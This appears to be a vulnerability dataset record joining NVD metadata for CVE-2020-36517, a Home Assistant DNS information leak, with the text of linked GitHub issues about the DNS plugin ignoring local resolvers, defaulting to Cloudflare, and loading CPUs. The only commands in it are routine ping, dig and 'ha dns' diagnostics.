"source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/17
[ "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
I've noticed that when I power cycle my machine running HassOS, that local DNS resolution doesn't work at all. Nearly all of my ESP8266 devices rely upon local DNS resolution so most devices stop working. The local DNS is set via DHCP. I don't set any upstream DNS, everything is supposed to be forwarded through my local DNS. I've found that I can get it resolved by running `ha dns restart` at which point my local DNS server starts getting used. ``` # ping lgwebostv.localdomain ping: bad address 'lgwebostv.localdomain` # ha dns restart Processing... Done. # ping lgwebostv.localdomain PING lgwebostv.localdomain (192.168.20.62): 56 data bytes ``` I've got Hassio supervisor 2020.12.6 on stable channel (HassOS 4.17; deployment production).
DNS Plugin is ignoring my local DNS on startup
https://api.github.com/repos/home-assistant/plugin-dns/issues/17/comments
1
2020-12-08T20:38:20Z
2021-01-20T01:15:17Z
https://github.com/home-assistant/plugin-dns/issues/17
759,762,237
17
3,300
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/20
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
In home assistant, if I use hostnames in configuration.yaml they fail to resolve (eg using platform snmp ). Using the corresponding IP addresses works, but is far from ideal and means I have to use fixed IP addresses and configuration becomes less unreadable and requires more maintenance. Trying to work out what is the root issue is, has led me to hassio-dns seemingly not working as I would expect. The homeassistant docker container appears to be using 172.30.32.3 for dns which is the hassio-dns container. From within the homeassistant container this local hostname fails to resolve: dig pdu3.netality.co.uk and I can see from the dig output it is going out to the Internet to do the DNS lookup. But dig pdu3.netality.co.uk @192.168.66.1 from home assistant does work (not surprisingly). The strange thing is from within the hassio-dns container, fully qualified and unqualified local hostname lookups do work: dig pdu3.netality.co.uk dig pdu3 But dig pdu3.netality.co.uk @172.30.32.3 does not work (unsurprisingly). What I would expect is that fully qualified and unqualified hostnames should resolve as I have set the search domain to netality.co.uk and dns server to 192.168.66.1 in HassOS. I don't think this has ever worked with hassio-dns. Versions: armhf-hassio-dns:2020.11.0 raspberrypi2-homeassistant:2020.12.1 armhf-hassio-supervisor:latest (2020.12.7) HassOS: 5.9
Not resolving local host names
https://api.github.com/repos/home-assistant/plugin-dns/issues/20/comments
105
2020-12-26T11:35:40Z
2025-05-07T16:59:57Z
https://github.com/home-assistant/plugin-dns/issues/20
774,861,780
20
3,301
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/22
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
The CoreDNS module is Home assistant is using CloudFlare DNS-over-TLS by default. This is basically exfilling my private data to a commercial 3rd party without my permission. There is no currently no way to disable this functionality. The CoreDNS module also attempts to lookup IPv6 AAAA records using CloudFlare when IPv6 is disabled in the supervisor network configuration. Hardcoded DNS is a breach of privacy and trust, either remove it completely, or provide an option to disable it.
Use of CloudFlare DNS, Privacy Breach
https://api.github.com/repos/home-assistant/plugin-dns/issues/22/comments
19
2021-01-18T12:01:39Z
2021-01-30T13:45:35Z
https://github.com/home-assistant/plugin-dns/issues/22
788,210,168
22
3,302
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/50
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
Since dns upgrade to 2021.06.0, my complete hassio setup is having performance issues. I am running haos on Raspberry Pi 1B. It's an old pi, but before dns 2021.06.0 everything was running without issues and I had no reason to upgrade hardware. Since dns upgrade, coredns will eventually get stuck at more than 60% CPU usage constantly and everything else slows down to the level that it's unusable. Even 'ha dns restart' is failing with time out. It's happening also with clean image install without configuring any integrations. When I downgrade to dns 2021.04.0 using 'ha dns update --version 2021.04.0', CPU usage is back to normal and whole system is responsive. Downgrading dns is not permanent fix as it gets automatically updated back to last version and CPU load increases again. **Is there an option to permanently downgrade to dns 2021.04.0 or disable DoT completely (if TLS is causing too much load on rpi1)?** **dns logs using 2021.06.01:** [INFO] 127.0.0.1:45539 - 6781 "NS IN . udp 17 false 512" NOERROR - 0 30.016215226s [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out [INFO] 127.0.0.1:47240 - 31621 "NS IN . udp 17 false 512" NOERROR - 0 30.014927277s [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out [INFO] 127.0.0.1:39746 - 20863 "NS IN . udp 17 false 512" NOERROR - 0 30.018269213s [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out [INFO] 127.0.0.1:40733 - 54343 "NS IN . udp 17 false 512" NOERROR - 0 30.006049544s [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out [INFO] 127.0.0.1:47464 - 56063 "NS IN . udp 17 false 512" NOERROR - 0 35.378188925s [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out [INFO] 127.0.0.1:33661 - 11713 "NS IN . udp 17 false 512" NOERROR - 0 30.888139468s [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out [INFO] 127.0.0.1:54301 - 4260 "NS IN . udp 17 false 512" NOERROR - 0 30.002718645s [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out [INFO] 127.0.0.1:33394 - 6453 "NS IN . udp 17 false 512" NOERROR - 0 30.032896855s [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out [INFO] 127.0.0.1:35429 - 10631 "NS IN . udp 17 false 512" NOERROR - 0 30.012585403s [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out **dns logs using 2021.04.0 (everything else the same, just downgraded dns):** [INFO] 172.30.32.1:39653 - 7139 "PTR IN 43.178.168.192.in-addr.arpa. udp 45 false 512" NXDOMAIN qr,aa,rd,ra 45 0.142744402s [INFO] 172.30.32.1:47120 - 56986 "PTR IN 1.178.168.192.in-addr.arpa. udp 44 false 512" NXDOMAIN qr,aa,rd,ra 44 0.04007399s [INFO] 172.30.32.1:42934 - 43274 "PTR IN 2.0.17.172.in-addr.arpa. udp 41 false 512" NXDOMAIN qr,aa,rd,ra 41 0.074434124s [INFO] 172.30.32.1:60416 - 61087 "PTR IN 80.178.168.192.in-addr.arpa. udp 45 false 512" NXDOMAIN qr,aa,rd,ra 45 0.035992093s [INFO] 172.30.32.1:48272 - 61848 "PTR IN 84.178.168.192.in-addr.arpa. udp 45 false 512" NXDOMAIN qr,aa,rd,ra 45 0.024411385s [INFO] 172.30.32.1:52543 - 46777 "PTR IN 43.178.168.192.in-addr.arpa. udp 45 false 512" NXDOMAIN qr,aa,rd,ra 45 0.107825254s [INFO] 172.30.32.1:44524 - 31012 "PTR IN 1.178.168.192.in-addr.arpa. udp 44 false 512" NXDOMAIN qr,aa,rd,ra 44 0.047429792s [INFO] 172.30.32.1:49698 - 36720 "PTR IN 2.0.17.172.in-addr.arpa. udp 41 false 512" NXDOMAIN qr,aa,rd,ra 41 0.032395175s [INFO] 172.30.32.1:35650 - 10995 "PTR IN 80.178.168.192.in-addr.arpa. udp 45 false 512" NXDOMAIN qr,aa,rd,ra 45 0.043622889s [INFO] 172.30.32.1:39872 - 23006 "PTR IN 84.178.168.192.in-addr.arpa. udp 45 false 512" NXDOMAIN qr,aa,rd,ra 45 0.046617813s [INFO] 172.30.32.1:60757 - 62788 "PTR IN 43.178.168.192.in-addr.arpa. udp 45 false 512" NXDOMAIN qr,aa,rd,ra 45 0.10125965s [INFO] 172.30.32.1:43480 - 13081 "PTR IN 1.178.168.192.in-addr.arpa. udp 44 false 512" NXDOMAIN qr,aa,rd,ra 44 0.050008839s 